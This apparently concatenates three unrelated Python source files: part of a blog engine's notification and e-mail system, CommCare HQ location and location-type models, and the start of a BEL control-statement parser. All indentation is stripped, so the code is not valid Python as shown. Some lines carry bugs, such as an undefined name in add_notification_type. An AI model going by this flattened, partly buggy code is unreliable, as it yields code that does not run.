def __init__(self, name, description, privileges):
self.name = name
self.description = description
self.privileges = privileges
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self.name)
class Notification(object):
"""A notification that can be sent to a user. It contains a message.
The message is a zeml construct.
"""
def __init__(self, id, message, user=Ellipsis):
self.message = parse_zeml(message, 'system')
self.id = id
self.sent_date = datetime.utcnow()
if user is Ellipsis:
self.user = get_request().user
else:
self.user = user
@property
def self_link(self):
link = self.message.query('a[class~=selflink]').first
if link is not None:
return link.attributes.get('href')
title = property(lambda x: x.message.query('/title').first)
details = property(lambda x: x.message.query('/details').first)
actions = property(lambda x: x.message.query('/actions').first)
summary = property(lambda x: x.message.query('/summary').first)
longtext = property(lambda x: x.message.query('/longtext').first)
class NotificationSystem(object):
"""Use this as a base class for specific notification systems such as
`JabberNotificationSystem` or `EmailNotificationSystem`.
The class must implement a method `send` that receives a notification
object and a user object as parameter and then sends the message via
the specific system. The plugin is itself responsible for extracting the
information necessary to send the message from the user object. (Like
extracting the email address).
"""
def __init__(self, app):
self.app = app
#: subclasses have to overrides this as class attributes.
name = None
key = None
def send(self, user, notification):
raise NotImplementedError()
class EMailNotificationSystem(NotificationSystem):
"""Sends notifications to user via E-Mail."""
key = 'email'
name = lazy_gettext(u'E-Mail')
def send(self, user, notification):
title = u'[%s] %s' % (
self.app.cfg['blog_title'],
notification.title.to_text()
)
text = self.mail_from_notification(notification)
send_email(title, text, [user.email])
def unquote_link(self, link):
"""Unquotes some kinds of links. For example mailto:foo links are
stripped and properly unquoted because the mails we write are in
plain text and nobody is interested in URLs there.
"""
scheme, netloc, path = urlsplit(link)[:3]
if scheme == 'mailto':
return url_unquote(path)
return link
def collect_list_details(self, container):
"""Returns the information collected from a single detail list item."""
for item in container.children:
if len(item.children) == 1 and item.children[0].name == 'a':
link = item.children[0]
href = link.attributes.get('href')
yield dict(text=link.to_text(simple=True),
link=self.unquote_link(href), is_textual=False)
else:
yield dict(text=item.to_text(multiline=False),
link=None, is_textual=True)
def find_details(self, container):
# no container given, nothing can be found
if container is None or not container.children:
return []
result = []
for child in container.children:
if child.name in ('ul', 'ol'):
result.extend(self.collect_list_details(child))
elif child.name == 'p':
result.extend(dict(text=child.to_text(),
link=None, is_textual=True))
return result
def find_actions(self, container):
if not container:
return []
ul = container.query('/ul').first
if not ul:
return []
return list(self.collect_list_details(ul))
def mail_from_notification(self, message):
title = message.title.to_text()
details = self.find_details(message.details)
longtext = message.longtext.to_text(collect_urls=True,
initial_indent=2)
actions = self.find_actions(message.actions)
return render_template('notifications/email.txt', title=title,
details=details, longtext=longtext,
actions=actions)
class NotificationManager(object):
"""The NotificationManager is informed about new notifications by the
send_notification function. It then decides to which notification
plugins the notification is handed over by looking up a database table
in the form:
user_id | notification_system | notification id
---------+---------------------+--------------------------
1 | jabber | NEW_COMMENT
1 | email | ZINE_UPGRADE_AVAILABLE
1 | sms | SERVER_EXPLODED
The NotificationManager also assures that only users interested in
a particular type of notifications receive a message.
"""
def __init__(self):
self.systems = {}
self.notification_types = DEFAULT_NOTIFICATION_TYPES.copy()
def send(self, notification):
# given the type of the notification, check what users want that
# notification; via what system and call the according
# notification system in order to finally deliver the message
subscriptions = NotificationSubscription.query.filter_by(
notification_id=notification.id.name
)
if notification.user:
subscriptions = subscriptions.filter(
NotificationSubscription.user!=notification.user
)
for subscription in subscriptions.all():
system = self.systems.get(subscription.notification_system)
if system is not None:
system.send(subscription.user, notification)
def types(self, user=None):
if not user:
user = get_request().user
for notification in self.notification_types.itervalues():
if user.has_privilege(notification.privileges):
yield notification
def add_notification_type(self, notification):
self.notification_types[type.name] = type
def _register(name, description, privileges=ENTER_ACCOUNT_PANEL):
"""Register a new builtin type of notifications."""
nottype = NotificationType(name, description, privileges)
DEFAULT_NOTIFICATION_TYPES[name] = nottype
globals()[name] = nottype
__all__.append(name)
_register('NEW_COMMENT',
lazy_gettext(u'When a new comment is received.'))
_register('COMMENT_REQUIRES_MODERATION',
lazy_gettext(u'When a comment requires moderation.'),
(MODERATE_OWN_PAGES | MODERATE_OWN_ENTRIES | MODERATE_COMMENTS))
_register('SECURITY_ALERT',
lazy_gettext(u'When Zine found an urgent security alarm.'),
BLOG_ADMIN)
_register('ZINE_ERROR', lazy_gettext(u'When Zine throws errors.'), BLOG_ADMIN)
DEFAULT_NOTIFICATION_SYSTEMS = [EMailNotificationSystem]
del _register
|
|
import warnings
from functools import partial
from bulk_update.helper import bulk_update as bulk_update_helper
from couchdbkit import ResourceNotFound
from dimagi.ext.couchdbkit import *
import itertools
from corehq.apps.cachehq.mixins import CachedCouchDocumentMixin
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.couch.migration import SyncSQLToCouchMixin, SyncCouchToSQLMixin
from dimagi.utils.decorators.memoized import memoized
from datetime import datetime
from django.db import models, transaction
import jsonfield
from casexml.apps.case.cleanup import close_case
from corehq.form_processor.interfaces.supply import SupplyInterface
from corehq.form_processor.exceptions import CaseNotFound
from corehq.apps.commtrack.const import COMMTRACK_USERNAME
from corehq.apps.domain.models import Domain
from corehq.apps.products.models import SQLProduct
from corehq.toggles import LOCATION_TYPE_STOCK_RATES
from corehq.util.soft_assert import soft_assert
from mptt.models import MPTTModel, TreeForeignKey, TreeManager
LOCATION_REPORTING_PREFIX = 'locationreportinggroup-'
def notify_of_deprecation(msg):
_assert = soft_assert(notify_admins=True, fail_if_debug=True)
message = "Deprecated Locations feature used: {}".format(msg)
_assert(False, message)
class LocationTypeManager(models.Manager):
def full_hierarchy(self, domain):
"""
Returns a graph of the form
{
'<loc_type_id>: (
loc_type,
{'<child_loc_type_id>': (child_loc_type, [...])}
)
}
"""
hierarchy = {}
def insert_loc_type(loc_type):
"""
Get parent location's hierarchy, insert loc_type into it, and return
hierarchy below loc_type
"""
if not loc_type.parent_type:
lt_hierarchy = hierarchy
else:
lt_hierarchy = insert_loc_type(loc_type.parent_type)
if loc_type.id not in lt_hierarchy:
lt_hierarchy[loc_type.id] = (loc_type, {})
return lt_hierarchy[loc_type.id][1]
for loc_type in self.filter(domain=domain).all():
insert_loc_type(loc_type)
return hierarchy
def by_domain(self, domain):
"""
Sorts location types by hierarchy
"""
ordered_loc_types = []
def step_through_graph(hierarchy):
for _, (loc_type, children) in hierarchy.items():
ordered_loc_types.append(loc_type)
step_through_graph(children)
step_through_graph(self.full_hierarchy(domain))
return ordered_loc_types
StockLevelField = partial(models.DecimalField, max_digits=10, decimal_places=1)
@memoized
def stock_level_config_for_domain(domain, commtrack_enabled):
from corehq.apps.commtrack.models import CommtrackConfig
ct_config = CommtrackConfig.for_domain(domain)
if (
(ct_config is None) or
(not commtrack_enabled) or
LOCATION_TYPE_STOCK_RATES.enabled(domain)
):
return None
else:
return ct_config.stock_levels_config
class LocationType(models.Model):
domain = models.CharField(max_length=255, db_index=True)
name = models.CharField(max_length=255)
code = models.SlugField(db_index=False, null=True)
parent_type = models.ForeignKey('self', null=True, on_delete=models.CASCADE)
administrative = models.BooleanField(default=False)
shares_cases = models.BooleanField(default=False)
view_descendants = models.BooleanField(default=False)
_expand_from = models.ForeignKey(
'self',
null=True,
related_name='+',
db_column='expand_from',
on_delete=models.CASCADE,
) # levels below this location type that we start expanding from
_expand_from_root = models.BooleanField(default=False, db_column='expand_from_root')
expand_to = models.ForeignKey('self', null=True, related_name='+', on_delete=models.CASCADE) # levels above this type that are synced
include_without_expanding = models.ForeignKey(
'self',
null=True,
related_name='+',
on_delete=models.SET_NULL,
) # include all leves of this type and their ancestors
last_modified = models.DateTimeField(auto_now=True)
emergency_level = StockLevelField(default=0.5)
understock_threshold = StockLevelField(default=1.5)
overstock_threshold = StockLevelField(default=3.0)
objects = LocationTypeManager()
class Meta:
app_label = 'locations'
unique_together = (
('domain', 'code'),
('domain', 'name'),
)
def __init__(self, *args, **kwargs):
super(LocationType, self).__init__(*args, **kwargs)
self._administrative_old = self.administrative
@property
def expand_from(self):
return self._expand_from
@expand_from.setter
def expand_from(self, value):
if self._expand_from_root is True:
self._expand_from_root = False
self._expand_from = value
@property
def expand_from_root(self):
return self._expand_from_root
@expand_from_root.setter
def expand_from_root(self, value):
if self._expand_from_root is False and value is True:
self._expand_from = None
self._expand_from_root = value
@property
@memoized
def commtrack_enabled(self):
return Domain.get_by_name(self.domain).commtrack_enabled
def _populate_stock_levels(self, config):
self.emergency_level = config.emergency_level
self.understock_threshold = config.understock_threshold
self.overstock_threshold = config.overstock_threshold
def save(self, *args, **kwargs):
if not self.code:
from corehq.apps.commtrack.util import unicode_slug
self.code = unicode_slug(self.name)
if not self.commtrack_enabled:
self.administrative = True
config = stock_level_config_for_domain(self.domain, self.commtrack_enabled)
if config:
self._populate_stock_levels(config)
is_not_first_save = self.pk is not None
saved = super(LocationType, self).save(*args, **kwargs)
if is_not_first_save:
self.sync_administrative_status()
return saved
def sync_administrative_status(self, sync_supply_points=True):
from .tasks import sync_administrative_status
if self._administrative_old != self.administrative:
sync_administrative_status.delay(self, sync_supply_points=sync_supply_points)
self._administrative_old = self.administrative
def __unicode__(self):
return self.name
def __repr__(self):
return u"LocationType(domain='{}', name='{}', administrative={})".format(
self.domain,
self.name,
self.administrative,
).encode('utf-8')
@property
@memoized
def can_have_children(self):
return LocationType.objects.filter(parent_type=self).exists()
@classmethod
def _pre_bulk_save(cls, objects):
if not objects:
return
commtrack_enabled = objects[0].commtrack_enabled
if not commtrack_enabled:
for o in objects:
o.administrative = True
domain = objects[0].domain
stock_config = stock_level_config_for_domain(domain, commtrack_enabled)
if stock_config:
for o in objects:
o._populate_stock_levels(stock_config)
@classmethod
def bulk_create(cls, objects):
# 'objects' is a list of new LocationType objects to be created
if not objects:
return []
cls._pre_bulk_save(objects)
domain = objects[0].domain
names = [o.name for o in objects]
cls.objects.bulk_create(objects)
# we can return 'objects' directly without the below extra DB call after django 1.10,
# which autosets 'id' attribute of all objects that are bulk created
return list(cls.objects.filter(domain=domain, name__in=names))
@classmethod
def bulk_update(cls, objects):
# 'objects' is a list of existing LocationType objects to be updated
# Note: this is tightly coupled with .bulk_management.NewLocationImporter.bulk_commit()
# so it can't be used on its own
cls._pre_bulk_save(objects)
now = datetime.utcnow()
for o in objects:
o.last_modified = now
# the caller should call 'sync_administrative_status' for individual objects
bulk_update_helper(objects)
@classmethod
def bulk_delete(cls, objects):
# Given a list of existing SQL objects, bulk delete them
if not objects:
return
ids = [o.id for o in objects]
cls.objects.filter(id__in=ids).delete()
class LocationQueriesMixin(object):
def location_ids(self):
return self.values_list('location_id', flat=True)
def couch_locations(self, wrapped=True):
"""
Returns the couch locations corresponding to this queryset.
"""
warnings.warn(
"Converting SQLLocations to couch locations. This should be "
"used for backwards compatability only - not new features.",
DeprecationWarning,
)
ids = self.location_ids()
locations = iter_docs(Location.get_db(), ids)
if wrapped:
return itertools.imap(Location.wrap, locations)
return locations
def accessible_to_user(self, domain, user):
if user.has_permission(domain, 'access_all_locations'):
return self.all()
users_location = user.get_sql_location(domain)
if not users_location:
return self.none() # No locations are accessible to this user
return self.all() & users_location.get_descendants(include_self=True)
class LocationQuerySet(LocationQueriesMixin, models.query.QuerySet):
pass
class LocationManager(LocationQueriesMixin, TreeManager):
def get_or_None(self, **kwargs):
try:
return self.get(**kwargs)
except SQLLocation.DoesNotExist:
return None
def _get_base_queryset(self):
return LocationQuerySet(self.model, using=self._db)
def get_queryset(self):
return (self._get_base_queryset()
.order_by(self.tree_id_attr, self.left_attr)) # mptt default
def get_from_user_input(self, domain, user_input):
"""
First check by site-code, if that fails, fall back to name.
Note that name lookup may raise MultipleObjectsReturned.
"""
try:
return self.get(domain=domain, site_code=user_input)
except self.model.DoesNotExist:
return self.get(domain=domain, name__iexact=user_input)
def filter_by_user_input(self, domain, user_input):
"""
Accepts partial matches, matches against name and site_code.
"""
return (self.filter(domain=domain)
.filter(models.Q(name__icontains=user_input) |
models.Q(site_code__icontains=user_input)))
def filter_path_by_user_input(self, domain, user_input):
"""
Returns a queryset including all locations matching the user input
and their children. This means "Middlesex" will match:
Massachusetts/Middlesex
Massachusetts/Middlesex/Boston
Massachusetts/Middlesex/Cambridge
It matches by name or site-code
"""
direct_matches = self.filter_by_user_input(domain, user_input)
return self.get_queryset_descendants(direct_matches, include_self=True)
class OnlyUnarchivedLocationManager(LocationManager):
def get_queryset(self):
return (super(OnlyUnarchivedLocationManager, self).get_queryset()
.filter(is_archived=False))
class SQLLocation(SyncSQLToCouchMixin, MPTTModel):
domain = models.CharField(max_length=255, db_index=True)
name = models.CharField(max_length=100, null=True)
location_id = models.CharField(max_length=100, db_index=True, unique=True)
_migration_couch_id_name = "location_id" # Used for SyncSQLToCouchMixin
location_type = models.ForeignKey(LocationType, on_delete=models.CASCADE)
site_code = models.CharField(max_length=255)
external_id = models.CharField(max_length=255, null=True)
metadata = jsonfield.JSONField(default=dict)
created_at = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
is_archived = models.BooleanField(default=False)
latitude = models.DecimalField(max_digits=20, decimal_places=10, null=True)
longitude = models.DecimalField(max_digits=20, decimal_places=10, null=True)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', on_delete=models.CASCADE)
# Use getter and setter below to access this value
# since stocks_all_products can cause an empty list to
# be what is stored for a location that actually has
# all products available.
_products = models.ManyToManyField(SQLProduct)
stocks_all_products = models.BooleanField(default=True)
supply_point_id = models.CharField(max_length=255, db_index=True, unique=True, null=True)
objects = _tree_manager = LocationManager()
# This should really be the default location manager
active_objects = OnlyUnarchivedLocationManager()
@classmethod
def _migration_get_fields(cls):
return ["domain", "name", "lineage", "site_code", "external_id",
"metadata", "is_archived"]
@classmethod
def _migration_get_couch_model_class(cls):
return Location
def _migration_do_sync(self):
couch_obj = self._migration_get_or_create_couch_object()
couch_obj._sql_location_type = self.location_type
couch_obj.latitude = float(self.latitude) if self.latitude else None
couch_obj.longitude = float(self.longitude) if self.longitude else None
self._migration_sync_to_couch(couch_obj)
@transaction.atomic()
def save(self, *args, **kwargs):
from corehq.apps.commtrack.models import sync_supply_point
self.supply_point_id = sync_supply_point(self)
sync_to_couch = kwargs.pop('sync_to_couch', True)
kwargs['sync_to_couch'] = False # call it here
super(SQLLocation, self).save(*args, **kwargs)
if sync_to_couch:
self._migration_do_sync()
@property
def lineage(self):
return list(self.get_ancestors(ascending=True).location_ids())
# # A few aliases for location_id to be compatible with couch locs
_id = property(lambda self: self.location_id)
get_id = property(lambda self: self.location_id)
group_id = property(lambda self: self.location_id)
@property
def products(self):
"""
If there are no products specified for this location, assume all
products for the domain are relevant.
"""
if self.stocks_all_products:
return SQLProduct.by_domain(self.domain)
else:
return self._products.all()
@products.setter
def products(self, value):
# this will set stocks_all_products to true if the user
# has added all products in the domain to this location
self.stocks_all_products = (set(value) ==
set(SQLProduct.by_domain(self.domain)))
self._products = value
def _close_case_and_remove_users(self):
"""
Closes linked supply point cases for a location and unassigns the users
assigned to that location.
Used by both archive and delete methods
"""
sp = self.linked_supply_point()
# sanity check that the supply point exists and is still open.
# this is important because if you archive a child, then try
# to archive the parent, we don't want to try to close again
if sp and not sp.closed:
close_case(sp.case_id, self.domain, COMMTRACK_USERNAME)
_unassign_users_from_location(self.domain, self.location_id)
def _archive_single_location(self):
"""
Archive a single location, caller is expected to handle
archiving children as well.
This is just used to prevent having to do recursive
couch queries in `archive()`.
"""
self.is_archived = True
self.save()
self._close_case_and_remove_users()
def archive(self):
"""
Mark a location and its descendants as archived.
This will cause it (and its data) to not show up in default Couch and
SQL views. This also unassigns users assigned to the location.
"""
for loc in self.get_descendants(include_self=True):
loc._archive_single_location()
def _unarchive_single_location(self):
"""
Unarchive a single location, caller is expected to handle
unarchiving children as well.
This is just used to prevent having to do recursive
couch queries in `unarchive()`.
"""
self.is_archived = False
self.save()
# reopen supply point case if needed
sp = self.linked_supply_point()
# sanity check that the supply point exists and is not open.
# this is important because if you unarchive a child, then try
# to unarchive the parent, we don't want to try to open again
if sp and sp.closed:
for action in sp.actions:
if action.action_type == 'close':
action.xform.archive(user_id=COMMTRACK_USERNAME)
break
def unarchive(self):
"""
Unarchive a location and reopen supply point case if it
exists.
"""
for loc in self.get_descendants(include_self=True):
loc._unarchive_single_location()
def full_delete(self):
"""
Delete a location and its dependants.
This also unassigns users assigned to the location.
"""
to_delete = self.get_descendants(include_self=True).couch_locations()
# if there are errors deleting couch locations, roll back sql delete
with transaction.atomic():
self.sql_full_delete()
Location.get_db().bulk_delete(to_delete)
def sql_full_delete(self):
"""
SQL ONLY FULL DELETE
Delete this location and it's descendants.
"""
ids_to_delete = self.get_descendants(include_self=True).location_ids()
for loc_id in ids_to_delete:
loc = SQLLocation.objects.prefetch_related(
'location_type').get(location_id=loc_id)
loc._sql_close_case_and_remove_users()
self.get_descendants(include_self=True).delete()
def _sql_close_case_and_remove_users(self):
"""
SQL ONLY VERSION
Closes linked supply point cases for a location and unassigns the users
assigned to that location.
Used by both archive and delete methods
"""
sp = self.linked_supply_point()
# sanity check that the supply point exists and is still open.
# this is important because if you archive a child, then try
# to archive the parent, we don't want to try to close again
if sp and not sp.closed:
close_case(sp.case_id, self.domain, COMMTRACK_USERNAME)
_unassign_users_from_location(self.domain, self.location_id)
class Meta:
app_label = 'locations'
unique_together = ('domain', 'site_code',)
def __unicode__(self):
return u"{} ({})".format(self.name, self.domain)
def __repr__(self):
return u"SQLLocation(domain='{}', name='{}', location_type='{}')".format(
self.domain,
self.name,
self.location_type.name,
).encode('utf-8')
@property
def display_name(self):
return u"{} [{}]".format(self.name, self.location_type.name)
def archived_descendants(self):
"""
Returns a list of archived descendants for this location.
"""
return self.get_descendants().filter(is_archived=True)
def child_locations(self, include_archive_ancestors=False):
"""
Returns a list of this location's children.
"""
children = self.get_children()
return filter_for_archived(children, include_archive_ancestors)
@classmethod
def root_locations(cls, domain, include_archive_ancestors=False):
roots = cls.objects.root_nodes().filter(domain=domain)
return filter_for_archived(roots, include_archive_ancestors)
def get_path_display(self):
return '/'.join(self.get_ancestors(include_self=True)
.values_list('name', flat=True))
def _make_group_object(self, user_id, case_sharing):
from corehq.apps.groups.models import UnsavableGroup
g = UnsavableGroup()
g.domain = self.domain
g.users = [user_id] if user_id else []
g.last_modified = datetime.utcnow()
if case_sharing:
g.name = self.get_path_display() + '-Cases'
g._id = self.location_id
g.case_sharing = True
g.reporting = False
else:
# reporting groups
g.name = self.get_path_display()
g._id = LOCATION_REPORTING_PREFIX + self.location_id
g.case_sharing = False
g.reporting = True
g.metadata = {
'commcare_location_type': self.location_type.name,
'commcare_location_name': self.name,
}
for key, val in self.metadata.items():
g.metadata['commcare_location_' + key] = val
return g
def get_case_sharing_groups(self, for_user_id=None):
if self.location_type.shares_cases:
yield self.case_sharing_group_object(for_user_id)
if self.location_type.view_descendants:
for sql_loc in self.get_descendants().filter(location_type__shares_cases=True, is_archived=False):
yield sql_loc.case_sharing_group_object(for_user_id)
def case_sharing_group_object(self, user_id=None):
"""
Returns a fake group object that cannot be saved.
This is used for giving users access via case
sharing groups, without having a real group
for every location that we have to manage/hide.
"""
return self._make_group_object(
user_id,
case_sharing=True,
)
@property
@memoized
def couch_location(self):
return Location.get(self.location_id)
def is_direct_ancestor_of(self, location):
return (location.get_ancestors(include_self=True)
.filter(pk=self.pk).exists())
@classmethod
def by_domain(cls, domain):
return cls.objects.filter(domain=domain)
@property
def path(self):
_path = list(reversed(self.lineage))
_path.append(self._id)
return _path
@classmethod
def by_location_id(cls, location_id):
try:
return cls.objects.get(location_id=location_id)
except cls.DoesNotExist:
return None
def linked_supply_point(self):
if not self.supply_point_id:
return None
try:
return SupplyInterface(self.domain).get_supply_point(self.supply_point_id)
except CaseNotFound:
return None
@property
def parent_location_id(self):
return self.parent.location_id if self.parent else None
@property
def location_type_object(self):
return self.location_type
@property
def location_type_name(self):
return self.location_type.name
@property
def sql_location(self):
# For backwards compatability
notify_of_deprecation("'sql_location' was just called on a sql_location. That's kinda silly.")
return self
def filter_for_archived(locations, include_archive_ancestors):
"""
Perform filtering on a location queryset.
include_archive_ancestors toggles between selecting only active
children and selecting any child that is archived or has
archived descendants.
"""
if include_archive_ancestors:
return [
item for item in locations
if item.is_archived or item.archived_descendants()
]
else:
return locations.filter(is_archived=False)
class Location(SyncCouchToSQLMixin, CachedCouchDocumentMixin, Document):
domain = StringProperty()
name = StringProperty()
site_code = StringProperty() # should be unique, not yet enforced
# unique id from some external data source
external_id = StringProperty()
metadata = DictProperty()
last_modified = DateTimeProperty()
is_archived = BooleanProperty(default=False)
latitude = FloatProperty()
longitude = FloatProperty()
# a list of doc ids, referring to the parent location, then the
# grand-parent, and so on up to the root location in the hierarchy
lineage = StringListProperty()
@classmethod
def wrap(cls, data):
last_modified = data.get('last_modified')
data.pop('location_type', None) # Only store location type in SQL
# if it's missing a Z because of the Aug. 2014 migration
# that added this in iso_format() without Z, then add a Z
# (See also Group class)
from corehq.apps.groups.models import dt_no_Z_re
if last_modified and dt_no_Z_re.match(last_modified):
data['last_modified'] += 'Z'
return super(Location, cls).wrap(data)
def __init__(self, *args, **kwargs):
from corehq.apps.locations.util import get_lineage_from_location, get_lineage_from_location_id
if 'parent' in kwargs:
parent = kwargs['parent']
if parent:
if isinstance(parent, Document):
lineage = get_lineage_from_location(parent)
else:
# 'parent' is a doc id
lineage = get_lineage_from_location_id(parent)
else:
lineage = []
kwargs['lineage'] = lineage
del kwargs['parent']
location_type = kwargs.pop('location_type', None)
super(Document, self).__init__(*args, **kwargs)
if location_type:
self.set_location_type(location_type)
def __unicode__(self):
return u"{} ({})".format(self.name, self.domain)
def __repr__(self):
return u"Location(domain='{}', name='{}', location_type='{}')".format(
self.domain,
self.name,
self.location_type_name,
).encode('utf-8')
def __eq__(self, other):
if isinstance(other, Location):
return self._id == other._id
else:
return False
def __hash__(self):
return hash(self._id)
@property
def sql_location(self):
return (SQLLocation.objects.prefetch_related('location_type')
.get(location_id=self._id))
@property
def location_id(self):
return self._id
@property
def location_type(self):
notify_of_deprecation(
"You should use either location_type_name or location_type_object")
return self.location_type_object.name
_sql_location_type = None
@location_type.setter
def location_type(self, value):
notify_of_deprecation("You should set location_type using `set_location_type`")
self.set_location_type(value)
def set_location_type(self, location_type_name):
msg = "You can't create a location without a real location type"
if not location_type_name:
raise LocationType.DoesNotExist(msg)
try:
self._sql_location_type = LocationType.objects.get(
domain=self.domain,
name=location_type_name,
)
except LocationType.DoesNotExist:
raise LocationType.DoesNotExist(msg)
@classmethod
def _migration_get_fields(cls):
return ["domain", "name", "site_code", "external_id", "metadata",
"is_archived", "latitude", "longitude"]
@classmethod
def _migration_get_sql_model_class(cls):
return SQLLocation
def _migration_do_sync(self):
sql_location = self._migration_get_or_create_sql_object()
location_type = self._sql_location_type or sql_location.location_type
sql_location.location_type = location_type
# sync parent connection
sql_location.parent = (SQLLocation.objects.get(location_id=self.parent_location_id)
if self.parent_location_id else None)
self._migration_sync_to_sql(sql_location)
def save(self, *args, **kwargs):
self.last_modified = datetime.utcnow()
# lazy migration for site_code
if not self.site_code:
from corehq.apps.commtrack.util import generate_code
all_codes = [
code.lower() for code in
(SQLLocation.objects.filter(domain=self.domain)
.values_list('site_code', flat=True))
]
self.site_code = generate_code(self.name, all_codes)
# Set the UUID here so we can save to SQL first (easier to rollback)
if not self._id:
self._id = self.get_db().server.next_uuid()
sync_to_sql = kwargs.pop('sync_to_sql', True)
kwargs['sync_to_sql'] = False # only sync here
with transaction.atomic():
if sync_to_sql:
self._migration_do_sync()
super(Location, self).save(*args, **kwargs)
@classmethod
def filter_by_type(cls, domain, loc_type, root_loc=None):
if root_loc:
query = root_loc.sql_location.get_descendants(include_self=True)
else:
query = SQLLocation.objects
ids = (query.filter(domain=domain, location_type__name=loc_type)
.location_ids())
return (
cls.wrap(l) for l in iter_docs(cls.get_db(), list(ids))
if not l.get('is_archived', False)
)
@classmethod
def by_domain(cls, domain, include_docs=True):
relevant_ids = SQLLocation.objects.filter(domain=domain).location_ids()
if not include_docs:
return relevant_ids
else:
return (
cls.wrap(l) for l in iter_docs(cls.get_db(), list(relevant_ids))
if not l.get('is_archived', False)
)
@classmethod
def by_site_code(cls, domain, site_code):
"""
This method directly looks up a single location
and can return archived locations.
"""
try:
return (SQLLocation.objects.get(domain=domain,
site_code__iexact=site_code)
.couch_location)
except (SQLLocation.DoesNotExist, ResourceNotFound):
return None
@classmethod
def root_locations(cls, domain):
"""
Return all active top level locations for this domain
"""
return list(SQLLocation.root_locations(domain).couch_locations())
@property
def is_root(self):
return not self.lineage
@property
def parent_location_id(self):
if self.is_root:
return None
return self.lineage[0]
@property
def parent_id(self):
# TODO this is deprecated as of 2016-07-19
# delete after we're sure this isn't called dynamically
# Django automagically reserves field_name+_id for foreign key fields,
# so because we have SQLLocation.parent, SQLLocation.parent_id refers
# to the Django primary key
notify_of_deprecation("parent_id should be replaced by parent_location_id")
return self.parent_location_id
@property
def parent(self):
parent_id = self.parent_location_id
return Location.get(parent_id) if parent_id else None
@property
def path(self):
_path = list(reversed(self.lineage))
_path.append(self._id)
return _path
@property
def descendants(self):
"""return list of all locations that have this location as an ancestor"""
return list(self.sql_location.get_descendants().couch_locations())
def get_children(self):
"""return list of immediate children of this location"""
return self.sql_location.get_children().couch_locations()
def linked_supply_point(self):
return self.sql_location.linked_supply_point()
@property
def group_id(self):
"""
This just returns the location's id. It used to add
a prefix.
"""
return self.location_id
@property
def location_type_object(self):
return self._sql_location_type or self.sql_location.location_type
@property
def location_type_name(self):
return self.location_type_object.name
def _unassign_users_from_location(domain, location_id):
"""
Unset location for all users assigned to that location.
"""
from corehq.apps.locations.dbaccessors import get_all_users_by_location
for user in get_all_users_by_location(domain, location_id):
if user.is_web_user():
user.unset_location_by_id(domain, location_id, fall_back_to_next=True)
elif user.is_commcare_user():
user.unset_location_by_id(location_id, fall_back_to_next=True)
|
|
# -*- coding: utf-8 -*-
"""Control parser.
This module handles parsing control statement, which add annotations and namespaces to the document.
.. see also::
https://wiki.openbel.org/display/BLD/Control+Records
"""
import logging
from typing import Any, Dict, List, Mapping, Optional, Pattern, Set
from pyparsing import And, Keyword, MatchFirst, ParseResults, Suppress, oneOf
from pyparsing import pyparsing_common as ppc
from .baseparser import BaseParser
from .utils import delimited_quoted_list, delimited_unquoted_list, is_int, qid, quote
from .. import constants as pc
from ..constants import (
ANNOTATIONS,
BEL_KEYWORD_ALL,
BEL_KEYWORD_CITATION,
BEL_KEYWORD_EVIDENCE,
BEL_KEYWORD_SET,
BEL_KEYWORD_STATEMENT_GROUP,
BEL_KEYWORD_SUPPORT,
BEL_KEYWORD_UNSET,
CITATION,
CITATION_TYPES,
EVIDENCE,
)
from ..exceptions import (
CitationTooLongException,
CitationTooShortException,
IllegalAnnotationValueWarning,
InvalidCitationType,
InvalidPubMedIdentifierWarning,
MissingAnnotationKeyWarning,
MissingAnnotationRegexWarning,
MissingCitationException,
UndefinedAnnotationWarning,
)
from ..language import CitationDict, Entity
__all__ = ["ControlParser"]
logger = logging.getLogger(__name__)
set_tag = Keyword(BEL_KEYWORD_SET)
unset_tag = Keyword(BEL_KEYWORD_UNSET)
unset_all = Suppress(BEL_KEYWORD_ALL)
supporting_text_tags = oneOf([BEL_KEYWORD_EVIDENCE, BEL_KEYWORD_SUPPORT])
set_statement_group_stub = And([Suppress(BEL_KEYWORD_STATEMENT_GROUP), Suppress("="), qid("group")])
set_citation_stub = And([Suppress(BEL_KEYWORD_CITATION), Suppress("="), delimited_quoted_list("values")])
set_evidence_stub = And([Suppress(supporting_text_tags), Suppress("="), quote("value")])
class ControlParser(BaseParser):
"""A parser for BEL control statements.
.. seealso::
BEL 1.0 specification on `control records
<http://openbel.org/language/version_1.0/bel_specification_version_1.0.html#_control_records>`_
"""
def __init__(
self,
annotation_to_term: Optional[Mapping[str, Set[str]]] = None,
annotation_to_pattern: Optional[Mapping[str, Pattern]] = None,
annotation_to_local: Optional[Mapping[str, Set[str]]] = None,
citation_clearing: bool = True,
required_annotations: Optional[List[str]] = None,
) -> None:
"""Initialize the control statement parser.
:param annotation_to_term: A dictionary of {annotation: set of valid values} defined with URL for parsing
:param annotation_to_pattern: A dictionary of {annotation: regular expression string}
:param annotation_to_local: A dictionary of {annotation: set of valid values} for parsing defined with LIST
:param citation_clearing: Should :code:`SET Citation` statements clear evidence and all annotations?
:param required_annotations: Annotations that are required
"""
self.citation_clearing = citation_clearing
self.annotation_to_term = annotation_to_term or {}
self.annotation_to_pattern = annotation_to_pattern or {}
self.annotation_to_local = annotation_to_local or {}
self.statement_group = None
self.citation_db = None
self.citation_db_id = None
self.evidence = None
self.annotations = {}
self.required_annotations = required_annotations or []
annotation_key = ppc.identifier("key").setParseAction(self.handle_annotation_key)
self.set_statement_group = set_statement_group_stub().setParseAction(self.handle_set_statement_group)
self.set_citation = set_citation_stub.setParseAction(self.handle_set_citation)
self.set_evidence = set_evidence_stub.setParseAction(self.handle_set_evidence)
set_command_prefix = And([annotation_key("key"), Suppress("=")])
self.set_command = set_command_prefix + qid("value")
self.set_command.setParseAction(self.handle_set_command)
self.set_command_list = set_command_prefix + delimited_quoted_list("values")
self.set_command_list.setParseAction(self.handle_set_command_list)
self.unset_command = annotation_key("key")
self.unset_command.addParseAction(self.handle_unset_command)
self.unset_evidence = supporting_text_tags(EVIDENCE)
self.unset_evidence.setParseAction(self.handle_unset_evidence)
self.unset_citation = Suppress(BEL_KEYWORD_CITATION)
self.unset_citation.setParseAction(self.handle_unset_citation)
self.unset_statement_group = Suppress(BEL_KEYWORD_STATEMENT_GROUP)
self.unset_statement_group.setParseAction(self.handle_unset_statement_group)
self.unset_list = delimited_unquoted_list("values")
self.unset_list.setParseAction(self.handle_unset_list)
self.unset_all = unset_all.setParseAction(self.handle_unset_all)
